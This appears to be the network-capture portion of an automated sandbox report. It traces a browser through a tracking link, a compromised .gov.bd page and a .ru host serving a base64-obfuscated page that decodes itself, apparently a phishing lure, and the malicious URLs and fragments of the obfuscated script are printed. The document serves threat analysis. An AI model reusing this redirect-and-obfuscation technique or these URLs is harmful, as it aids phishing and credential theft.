                                    Dec 10, 2024 18:13:21.032491922 CET6107053192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:21.032645941 CET5003953192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:21.169389009 CET53610701.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:21.169414043 CET53500391.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:37.413764954 CET53548791.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:57.790604115 CET53570311.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:57.814785957 CET138138192.168.2.7192.168.2.255
                                    Dec 10, 2024 18:14:00.242640972 CET53571331.1.1.1192.168.2.7
                                    TimestampSource IPDest IPChecksumCodeType
                                    Dec 10, 2024 18:13:16.924199104 CET192.168.2.71.1.1.1c24c(Port unreachable)Destination Unreachable
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 10, 2024 18:13:02.058608055 CET192.168.2.71.1.1.10x2628Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:02.058832884 CET192.168.2.71.1.1.10x98f9Standard query (0)www.google.com65IN (0x0001)false
                                    Dec 10, 2024 18:13:03.484359026 CET192.168.2.71.1.1.10xe88cStandard query (0)clickme.thryv.comA (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:03.484672070 CET192.168.2.71.1.1.10x2b76Standard query (0)clickme.thryv.com65IN (0x0001)false
                                    Dec 10, 2024 18:13:07.274816990 CET192.168.2.71.1.1.10x9ce5Standard query (0)tafaruqueschoolandcollege.gov.bdA (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:07.274954081 CET192.168.2.71.1.1.10x8fbeStandard query (0)tafaruqueschoolandcollege.gov.bd65IN (0x0001)false
                                    Dec 10, 2024 18:13:09.895210028 CET192.168.2.71.1.1.10xc8a4Standard query (0)0hxj.diitalwave.ruA (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:09.895611048 CET192.168.2.71.1.1.10xcf12Standard query (0)0hxj.diitalwave.ru65IN (0x0001)false
                                    Dec 10, 2024 18:13:14.239778996 CET192.168.2.71.1.1.10xfe3aStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:14.240077019 CET192.168.2.71.1.1.10xdcbbStandard query (0)code.jquery.com65IN (0x0001)false
                                    Dec 10, 2024 18:13:16.531919956 CET192.168.2.71.1.1.10x42b8Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:16.532217979 CET192.168.2.71.1.1.10x5cbfStandard query (0)code.jquery.com65IN (0x0001)false
                                    Dec 10, 2024 18:13:16.554666042 CET192.168.2.71.1.1.10xcc5dStandard query (0)blogger.googleusercontent.comA (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:16.554840088 CET192.168.2.71.1.1.10x3d61Standard query (0)blogger.googleusercontent.com65IN (0x0001)false
                                    Dec 10, 2024 18:13:20.722289085 CET192.168.2.71.1.1.10x44c4Standard query (0)blogger.googleusercontent.comA (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:20.722461939 CET192.168.2.71.1.1.10x52fStandard query (0)blogger.googleusercontent.com65IN (0x0001)false
                                    Dec 10, 2024 18:13:21.032491922 CET192.168.2.71.1.1.10x2f3bStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:21.032645941 CET192.168.2.71.1.1.10xb274Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 10, 2024 18:13:02.195506096 CET1.1.1.1192.168.2.70x2628No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:02.198213100 CET1.1.1.1192.168.2.70x98f9No error (0)www.google.com65IN (0x0001)false
                                    Dec 10, 2024 18:13:04.188359022 CET1.1.1.1192.168.2.70x2b76No error (0)clickme.thryv.comd1rsqi0l6b7evg.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                    Dec 10, 2024 18:13:04.189183950 CET1.1.1.1192.168.2.70xe88cNo error (0)clickme.thryv.comd1rsqi0l6b7evg.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                    Dec 10, 2024 18:13:04.189183950 CET1.1.1.1192.168.2.70xe88cNo error (0)d1rsqi0l6b7evg.cloudfront.net18.165.220.123A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:04.189183950 CET1.1.1.1192.168.2.70xe88cNo error (0)d1rsqi0l6b7evg.cloudfront.net18.165.220.95A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:04.189183950 CET1.1.1.1192.168.2.70xe88cNo error (0)d1rsqi0l6b7evg.cloudfront.net18.165.220.9A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:04.189183950 CET1.1.1.1192.168.2.70xe88cNo error (0)d1rsqi0l6b7evg.cloudfront.net18.165.220.54A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:07.766129017 CET1.1.1.1192.168.2.70x9ce5No error (0)tafaruqueschoolandcollege.gov.bd5.9.227.67A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:10.314615965 CET1.1.1.1192.168.2.70xcf12No error (0)0hxj.diitalwave.ru65IN (0x0001)false
                                    Dec 10, 2024 18:13:10.315092087 CET1.1.1.1192.168.2.70xc8a4No error (0)0hxj.diitalwave.ru172.67.145.201A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:10.315092087 CET1.1.1.1192.168.2.70xc8a4No error (0)0hxj.diitalwave.ru104.21.71.155A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:14.388910055 CET1.1.1.1192.168.2.70xfe3aNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:14.388910055 CET1.1.1.1192.168.2.70xfe3aNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:14.388910055 CET1.1.1.1192.168.2.70xfe3aNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:14.388910055 CET1.1.1.1192.168.2.70xfe3aNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:16.668786049 CET1.1.1.1192.168.2.70x42b8No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:16.668786049 CET1.1.1.1192.168.2.70x42b8No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:16.668786049 CET1.1.1.1192.168.2.70x42b8No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:16.668786049 CET1.1.1.1192.168.2.70x42b8No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:16.692127943 CET1.1.1.1192.168.2.70xcc5dNo error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                    Dec 10, 2024 18:13:16.692127943 CET1.1.1.1192.168.2.70xcc5dNo error (0)googlehosted.l.googleusercontent.com172.217.19.225A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:16.924081087 CET1.1.1.1192.168.2.70x3d61No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                    Dec 10, 2024 18:13:20.861710072 CET1.1.1.1192.168.2.70x44c4No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                    Dec 10, 2024 18:13:20.861710072 CET1.1.1.1192.168.2.70x44c4No error (0)googlehosted.l.googleusercontent.com172.217.19.225A (IP address)IN (0x0001)false
                                    Dec 10, 2024 18:13:20.862097025 CET1.1.1.1192.168.2.70x52fNo error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                    Dec 10, 2024 18:13:21.169389009 CET1.1.1.1192.168.2.70x2f3bNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                    • clickme.thryv.com
                                    • tafaruqueschoolandcollege.gov.bd
                                    • https:
                                      • 0hxj.diitalwave.ru
                                      • code.jquery.com
                                      • blogger.googleusercontent.com
                                    • a.nel.cloudflare.com
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.74970918.165.220.1234437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-10 17:13:05 UTC1177OUTGET /ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D HTTP/1.1
                                    Host: clickme.thryv.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-12-10 17:13:07 UTC456INHTTP/1.1 302 Found
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 84
                                    Connection: close
                                    Server: nginx
                                    Date: Tue, 10 Dec 2024 17:13:06 GMT
                                    X-Robots-Tag: noindex, nofollow
                                    Location: https://tafaruqueschoolandcollege.gov.bd/cgi-admin/54321.html
                                    X-Cache: Miss from cloudfront
                                    Via: 1.1 680370d83a2dca8172426cfc0e48cf92.cloudfront.net (CloudFront)
                                    X-Amz-Cf-Pop: BAH53-P1
                                    X-Amz-Cf-Id: SVwZigul_1xM3PZMaab-RwNbutWKQpcQ-uBO-hMHnxUzuIq1UnVmAg==
                                    2024-12-10 17:13:07 UTC84INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 61 66 61 72 75 71 75 65 73 63 68 6f 6f 6c 61 6e 64 63 6f 6c 6c 65 67 65 2e 67 6f 76 2e 62 64 2f 63 67 69 2d 61 64 6d 69 6e 2f 35 34 33 32 31 2e 68 74 6d 6c 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                    Data Ascii: <a href="https://tafaruqueschoolandcollege.gov.bd/cgi-admin/54321.html">Found</a>.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.7497135.9.227.674437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-10 17:13:09 UTC695OUTGET /cgi-admin/54321.html HTTP/1.1
                                    Host: tafaruqueschoolandcollege.gov.bd
                                    Connection: keep-alive
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-12-10 17:13:09 UTC387INHTTP/1.1 200 OK
                                    Connection: close
                                    content-type: text/html
                                    last-modified: Tue, 10 Dec 2024 05:47:51 GMT
                                    accept-ranges: bytes
                                    content-length: 1736
                                    date: Tue, 10 Dec 2024 17:13:09 GMT
                                    server: LiteSpeed
                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                    2024-12-10 17:13:09 UTC981INData Raw: 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 36 75 66 67 69 37 6f 79 68 38 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>56ufgi7oyh8</title> <script> document.addEventListener('DOMContentLoaded', function() {
                                    2024-12-10 17:13:09 UTC755INData Raw: 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 65 67 65 78 20 3d 20 6e 65 77 20 52 65 67 45 78 70 28 27 5b 3f 26 5d 27 20 2b 20 6e 61 6d 65 20 2b 20 27 28 3d 28 5b 5e 26 23 5d 2a 29 7c 26 7c 23 7c 24 29 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 65 73 75 6c 74 73 20 3d 20 72 65 67 65 78 2e 65 78 65 63 28 75 72 6c 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 72 65 73 75 6c 74 73 29 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 72 65 73 75 6c 74 73 5b 32 5d 29 20 72 65 74 75 72 6e 20 27 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 72 65 73 75 6c 74 73 5b 32 5d 2e 72 65 70 6c 61 63 65 28
                                    Data Ascii: ); var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'); var results = regex.exec(url); if (!results) return null; if (!results[2]) return ''; return decodeURIComponent(results[2].replace(


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.7497195.9.227.674437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-10 17:13:11 UTC640OUTGET /favicon.ico HTTP/1.1
                                    Host: tafaruqueschoolandcollege.gov.bd
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://tafaruqueschoolandcollege.gov.bd/cgi-admin/54321.html
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-12-10 17:13:11 UTC416INHTTP/1.1 404 Not Found
                                    Connection: close
                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                    pragma: no-cache
                                    content-type: text/html
                                    content-length: 1251
                                    date: Tue, 10 Dec 2024 17:13:11 GMT
                                    server: LiteSpeed
                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                    2024-12-10 17:13:11 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                    2024-12-10 17:13:11 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.749728172.67.145.2014437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-10 17:13:12 UTC713OUTGET /HvdnqK-qqvXHs/ HTTP/1.1
                                    Host: 0hxj.diitalwave.ru
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-Dest: document
                                    Referer: https://tafaruqueschoolandcollege.gov.bd/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-12-10 17:13:13 UTC1228INHTTP/1.1 200 OK
                                    Date: Tue, 10 Dec 2024 17:13:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Cache-Control: no-cache, private
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dhg8%2BaMymMVEGxxVxwHOj035jBZ97E%2B7MP3CRlYq5NhIlPuAilUPHgNl%2ByUuxxKkG4AjI1Dubed%2FvtFV4gkgK6oJLzDk7o362P3xPwZj2JJwvMvhYuovOF4EQONtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=7850&min_rtt=805&rtt_var=3662&sent=74&recv=61&lost=0&retrans=1&sent_bytes=66397&recv_bytes=6181&delivery_rate=12360975&cwnd=254&unsent_bytes=0&cid=9bce04540873f149&ts=118076&x=0"
                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6Im4rYjdCYzFBRzNmVUJhRlh6SXpCOUE9PSIsInZhbHVlIjoiSmt4YmRVMWVxV1dPakI3SExxNFNKWko4UXRCWDZmdGFjT3g4WHVhZm4yUWZOZEFOc1l0ZWpSc0E0cjExOGZzc0RtN0p2YnNDVUdPbDlSbXBpZnhZNzRTYU51WXV1MGwzRG9GeEdLODdncmRqdVF5cldLZmtEUXFHQTNXcHhtM2ciLCJtYWMiOiJiZmMzZGZlZWFlZmE1ZWEzNzM1M2ZmMzIzODc3Mzg0NjI0NDRiYmQzYzk3MDZmNDQwY2ViNWMyNWVmZGFiYzRjIiwidGFnIjoiIn0%3D; expires=Tue, 10-Dec-2024 19:13:13 GMT; Max-Age=7200; path=/; secure; samesite=none
                                    2024-12-10 17:13:13 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 52 69 57 47 78 45 54 46 6c 74 59 55 78 52 56 46 46 51 4e 45 39 79 61 56 41 72 54 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 55 63 33 5a 44 68 43 64 6e 68 69 57 48 55 78 54 45 6f 31 57 54 64 4e 5a 56 68 56 4e 54 41 76 56 44 68 78 51 30 68 6c 61 46 6f 31 55 55 73 35 64 47 64 69 4c 7a 5a 6f 59 56 56 33 65 48 52 4a 62 43 74 72 62 58 4a 56 51 58 70 4c 61 57 38 7a 51 6a 49 76 52 54 64 52 4e 6d 4d 30 5a 46 6c 56 65 57 4e 30 56 6b 35 5a 54 43 39 42 53 47 31 6f 61 30 59 78 4e 47 74 46 64 6d 74 48 62 30 35 61 64 6c 52 74 65 58 64 6e 53 57 64 79 59 6e 46 73 56 55 56 78 4f 54 6c 54 61 33 70 4d 52 46 64 50 62 33 67 35 55 30 35 45 59 30 67
                                    Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InRiWGxETFltYUxRVFFQNE9yaVArTkE9PSIsInZhbHVlIjoiNUc3ZDhCdnhiWHUxTEo1WTdNZVhVNTAvVDhxQ0hlaFo1UUs5dGdiLzZoYVV3eHRJbCtrbXJVQXpLaW8zQjIvRTdRNmM0ZFlVeWN0Vk5ZTC9BSG1oa0YxNGtFdmtHb05adlRteXdnSWdyYnFsVUVxOTlTa3pMRFdPb3g5U05EY0g
                                    2024-12-10 17:13:13 UTC1369INData Raw: 33 34 36 38 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 77 61 46 68 71 4c 6d 52 70 61 58 52 68 62 48 64 68 64 6d 55 75 63 6e 55 76 53 48 5a 6b 62 6e 46 4c 4c 58 46 78 64 6c 68 49 63 79 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53
                                    Data Ascii: 3468<script>if(atob("aHR0cHM6Ly8waFhqLmRpaXRhbHdhdmUucnUvSHZkbnFLLXFxdlhIcy8=") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS
                                    2024-12-10 17:13:13 UTC1369INData Raw: 64 46 6b 34 52 44 51 76 63 7a 4d 7a 4f 54 59 76 64 58 4e 6c 63 6d 6c 75 64 47 56 79 4c 6e 42 75 5a 79 49 70 4f 77 30 4b 49 43 41 67 49 47 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 63 32 6c 36 5a 54 6f 67 59 32 39 32 5a 58 49 37 44 51 6f 67 49 43 41 67 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 77 62 33 4e 70 64 47 6c 76 62 6a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 5a 70 62 48 52 6c 63 6a 6f 67 59 6d 78 31 63 69 67 78 4e 48 42 34 4b 54 73 4e 43 69 41 67 49 43 42 36 4c 57 6c 75 5a 47 56 34 4f 69 41 74 4d 54 73 4e 43 6e 30 4e 43 69 35 6a 62 32 35 30 5a 57 35 30 49 48 73 4e 43 69 41 67 49 43 42 77 62 33 4e 70 64 47 6c 76 62 6a 6f 67 63 6d 56 73 59 58 52 70 64 6d 55 37 44 51 6f 67 49 43 41 67 65 69 31 70 62 6d 52 6c 65 44 6f 67 4d 54 73
                                    Data Ascii: dFk4RDQvczMzOTYvdXNlcmludGVyLnBuZyIpOw0KICAgIGJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogICAgYmFja2dyb3VuZC1wb3NpdGlvbjogY2VudGVyOw0KICAgIGZpbHRlcjogYmx1cigxNHB4KTsNCiAgICB6LWluZGV4OiAtMTsNCn0NCi5jb250ZW50IHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgei1pbmRleDogMTs
